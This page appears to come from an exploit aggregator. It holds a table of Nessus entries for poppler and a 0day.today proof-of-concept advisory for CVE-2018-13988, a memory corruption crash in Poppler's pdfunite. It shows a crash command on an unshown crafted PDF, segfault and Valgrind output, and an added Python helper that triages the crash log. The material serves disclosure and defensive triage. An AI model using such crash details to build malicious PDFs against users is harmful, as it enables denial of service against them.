| Title | Published | Views | Family |
|---|---|---|---|
| Amazon Linux 2 : poppler (ALAS-2019-1217) | 31 May 2019 00:00 | – | nessus |
| Amazon Linux AMI : poppler (ALAS-2018-1110) | 7 Dec 2018 00:00 | – | nessus |
| CentOS 7 : PackageKit / accountsservice / adwaita-icon-theme / appstream-data / at-spi2-atk / etc (CESA-2018:3140) | 16 Nov 2018 00:00 | – | nessus |
| EulerOS 2.0 SP3 : poppler (EulerOS-SA-2018-1393) | 10 Dec 2018 00:00 | – | nessus |
| EulerOS 2.0 SP5 : poppler (EulerOS-SA-2019-1010) | 8 Jan 2019 00:00 | – | nessus |
| EulerOS 2.0 SP2 : poppler (EulerOS-SA-2019-1054) | 22 Feb 2019 00:00 | – | nessus |
| Fedora 28 : mingw-poppler (2018-12b934e224) | 3 Jan 2019 00:00 | – | nessus |
| Fedora 28 : poppler (2018-c8c7d35b83) | 3 Jan 2019 00:00 | – | nessus |
| Fedora 27 : poppler (2018-e1f03d1f72) | 15 Aug 2018 00:00 | – | nessus |
| MiracleLinux 7 : [security - medium] GNOME (AXSA:2019-3574:01) | 16 Jan 2026 00:00 | – | nessus |
################
#Title: Poppler v0.62.0 Memory Corruption Vulnerability
#CVE: CVE-2018-13988
#CWE: CWE-119
#Exploit Author: Hosein Askari
#Vendor HomePage: https://poppler.freedesktop.org/
#Version : version 0.62.0 and earlier versions
#Tested on: Ubuntu 18.04 (4.15.0-23-generic)
#Date: July 21 2018
#Category: Application
#Author Mail : [email protected]
#Description: Poppler through 0.62 contains a memory corruption vulnerability due to an incorrect memory access that is not mapped in its memory space (improper handling of objects in memory), as demonstrated by pdfunite. This can result in memory corruption and denial of service. This may be exploitable when a victim opens a specially crafted PDF file.
#Fixed: https://poppler.freedesktop.org/poppler-0.66.0.tar.xz
###############
[email protected]:~$ pdfunite crafted.pdf aa.pdf
Segmentation fault (core dumped)
###############
[14925.737845] pdfunite[5097]: segfault at 564d6cf85714 ip 00007f42ac6fd064 sp 00007ffee66adf28 error 4 in libpoppler.so.73.0.0[7f42ac588000+251000]
###############
[email protected]:~$ sudo cat /proc/14698/maps
[sudo] password for constantine:
##################
==14154== Process terminating with default action of signal 11 (SIGSEGV)
==14154== Bad permissions for mapped region at address 0x8A8F4F4
==14154== at 0x4FB1064: XRef::getEntry(int, bool) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AA7D: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9ACAE: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9ACAE: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9A8EB: PDFDoc::markDictionnary(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AD07: PDFDoc::markObject(Object*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x4F9AEDC: PDFDoc::markPageObjects(Dict*, XRef*, XRef*, unsigned int, int, int, std::set<Dict*, std::less<Dict*>, std::allocator<Dict*> >*) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)
==14154== by 0x10A85B: main (in /usr/bin/pdfunite)
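Added example (not part of the original advisory): a triage helper that parses the kernel segfault line shown above, decodes the x86 page-fault error code, and reduces the instruction pointer to an ASLR-independent offset inside libpoppler so repeated crashes can be grouped. The function names are made up for this example; the log line and the Valgrind frame are copied from the advisory.

```python
import re

# Kernel line and Valgrind top frame copied from the advisory above.
DMESG = ("[14925.737845] pdfunite[5097]: segfault at 564d6cf85714 ip 00007f42ac6fd064 "
         "sp 00007ffee66adf28 error 4 in libpoppler.so.73.0.0[7f42ac588000+251000]")
VALGRIND_FRAME = "==14154== at 0x4FB1064: XRef::getEntry(int, bool) (in /usr/lib/x86_64-linux-gnu/libpoppler.so.73.0.0)"

SEGV_RE = re.compile(
    r"(?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
    r"(?: in (?P<module>[^\[\s]+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\])?")

def decode_error(code):
    """Decode the x86 page-fault error code bits the kernel prints after 'error'."""
    return {
        "cause": "protection violation" if code & 1 else "page not present",
        "access": "write" if code & 2 else "read",
        "mode": "user" if code & 4 else "kernel",
        "instruction_fetch": bool(code & 16),
    }

def parse_segfault(line):
    """Return a triage record for one kernel segfault line, or None if it does not match."""
    m = SEGV_RE.search(line)
    if not m:
        return None
    rec = {"comm": m["comm"], "pid": int(m["pid"]),
           "fault_addr": int(m["addr"], 16), "ip": int(m["ip"], 16),
           "module": m["module"], "module_offset": None}
    rec.update(decode_error(int(m["err"])))
    if m["module"]:
        base, size = int(m["base"], 16), int(m["size"], 16)
        if base <= rec["ip"] < base + size:
            # ASLR-independent key: the same bug gives the same offset on every run.
            rec["module_offset"] = rec["ip"] - base
    return rec

def same_page_offset(ip, frame_line):
    """Compare the low 12 bits; mappings are page-aligned, so they survive relocation."""
    m = re.search(r"\b(?:at|by) 0x([0-9A-Fa-f]+):", frame_line)
    return m is not None and (int(m.group(1), 16) & 0xFFF) == (ip & 0xFFF)

if __name__ == "__main__":
    rec = parse_segfault(DMESG)
    print(rec["module"], hex(rec["module_offset"]), rec["cause"], rec["access"], rec["mode"])
    print("matches Valgrind top frame:", same_page_offset(rec["ip"], VALGRIND_FRAME))
```

For the advisory's line this yields a user-mode read of a non-present page at offset 0x175064 in libpoppler.so.73.0.0, and the page offset agrees with the Valgrind frame in XRef::getEntry.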
References:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=004e3c10df0abda214f0c293f9e269fdd979c5ee
# 0day.today [2018-07-24] #Data